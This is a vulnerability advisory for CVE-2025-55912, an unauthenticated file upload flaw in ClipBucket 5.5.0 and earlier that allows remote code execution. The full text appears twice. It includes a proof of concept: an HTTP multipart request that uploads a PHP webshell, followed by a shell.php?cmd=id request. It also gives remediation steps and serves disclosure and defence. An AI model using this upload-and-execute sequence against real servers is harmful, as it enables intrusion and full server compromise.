Summary
ClipBucket versions ≤ 5.5.0 include an unauthenticated arbitrary file upload vulnerability in upload/actions/photo_uploader.php. The upload endpoint permits file uploads without proper authentication or sufficient validation, enabling an attacker to upload a PHP webshell and achieve remote code execution (RCE).
Details
The photo_uploader.php endpoint (plupload handler) does not enforce authentication or properly validate uploaded file types and content. File extension checks and MIME checks can be bypassed, allowing an attacker to submit a malicious PHP payload (for example shell.php) that is stored in a web-accessible directory and then executed by requesting the uploaded file.
Relevant code (example path):
https://github.com/MacWarrior/clipbucket-v5/blob/5.5.0/upload/actions/photo_uploader.php (ClipBucket 5.5.0)
PoC
No authentication required.
Example multipart POST to upload a PHP webshell:
POST /upload/actions/photo_uploader.php HTTP/1.1
Host: victim.example.com
Content-Type: multipart/form-data; boundary=----BOUNDARY
------BOUNDARY
Content-Disposition: form-data; name="Filedata"; filename="shell.php"
Content-Type: application/x-php
------BOUNDARY--
If the upload succeeds and the file is stored under http://victim.example.com/files/photos/shell.php, the attacker can execute commands:
http://victim.example.com/files/photos/shell.php?cmd=id
Expected response: output of id, showing RCE.
Notes:
The exact stored path may vary (e.g., /files/photos/); inspect upload behavior or successful upload response to find the URL.
Bypassing naive extension checks can be done by tampering with multipart filename, content-type headers, or using double extensions if present as the exact exploitation trick is not revealed here for obvious security reasons..
Impact
Vulnerability type: Unauthenticated Arbitrary File Upload (CWE-434) → Remote Code Execution.
Affected versions: ClipBucket ≤ 5.5.0 (confirmed).
Impact: Full server compromise (RCE) via unauthenticated upload and execution of PHP code. High severity.
Remediation
Require authentication and authorization on upload endpoints. Do not allow unauthenticated uploads.
Enforce strict server-side validation: allow a safe list of file types/extensions, verify file contents (magic bytes), and reject suspicious uploads.
Store uploaded files outside the web root or ensure uploaded files are served through a proxy or with sanitized filenames and denied execution permissions (e.g., store outside public_html or set chmod to disallow execution).
If PHP must be stored in web root, ensure the server does not execute user-uploaded files (use separate storage or content-disposition handling).
Add server-side scanning (AV, mime checks) and limit accepted size/types.
References:
https://github.com/MacWarrior/clipbucket-v5/tree/5.5.0
CVE: CVE-2025-55912
Credit: Discovered and reported by Mukundsinh Solanki (r00td3str0y3r) — https://x.com/r00td3str0y3r
mukundsinh Finder
Summary
ClipBucket versions ≤ 5.5.0 include an unauthenticated arbitrary file upload vulnerability in upload/actions/photo_uploader.php. The upload endpoint permits file uploads without proper authentication or sufficient validation, enabling an attacker to upload a PHP webshell and achieve remote code execution (RCE).
Details
The photo_uploader.php endpoint (plupload handler) does not enforce authentication or properly validate uploaded file types and content. File extension checks and MIME checks can be bypassed, allowing an attacker to submit a malicious PHP payload (for example shell.php) that is stored in a web-accessible directory and then executed by requesting the uploaded file.
Relevant code (example path):
https://github.com/MacWarrior/clipbucket-v5/blob/5.5.0/upload/actions/photo_uploader.php (ClipBucket 5.5.0)
PoC
No authentication required.
Example multipart POST to upload a PHP webshell:
POST /upload/actions/photo_uploader.php HTTP/1.1
Host: victim.example.com
Content-Type: multipart/form-data; boundary=----BOUNDARY
------BOUNDARY
Content-Disposition: form-data; name="Filedata"; filename="shell.php"
Content-Type: application/x-php
------BOUNDARY--
If the upload succeeds and the file is stored under http://victim.example.com/files/photos/shell.php, the attacker can execute commands:
http://victim.example.com/files/photos/shell.php?cmd=id
Expected response: output of id, showing RCE.
Notes:
The exact stored path may vary (e.g., /files/photos/); inspect upload behavior or successful upload response to find the URL.
Bypassing naive extension checks can be done by tampering with multipart filename, content-type headers, or using double extensions if present as the exact exploitation trick is not revealed here for obvious security reasons..
Impact
Vulnerability type: Unauthenticated Arbitrary File Upload (CWE-434) → Remote Code Execution.
Affected versions: ClipBucket ≤ 5.5.0 (confirmed).
Impact: Full server compromise (RCE) via unauthenticated upload and execution of PHP code. High severity.
Remediation
Require authentication and authorization on upload endpoints. Do not allow unauthenticated uploads.
Enforce strict server-side validation: allow a safe list of file types/extensions, verify file contents (magic bytes), and reject suspicious uploads.
Store uploaded files outside the web root or ensure uploaded files are served through a proxy or with sanitized filenames and denied execution permissions (e.g., store outside public_html or set chmod to disallow execution).
If PHP must be stored in web root, ensure the server does not execute user-uploaded files (use separate storage or content-disposition handling).
Add server-side scanning (AV, mime checks) and limit accepted size/types.
References:
https://github.com/MacWarrior/clipbucket-v5/tree/5.5.0
CVE: CVE-2025-55912
Credit: Discovered and reported by Mukundsinh Solanki (r00td3str0y3r) — https://x.com/r00td3str0y3r